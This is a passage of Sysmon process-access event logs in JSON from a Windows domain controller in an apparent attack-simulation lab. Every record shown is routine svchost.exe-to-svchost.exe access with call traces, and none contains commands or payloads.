C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.428","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 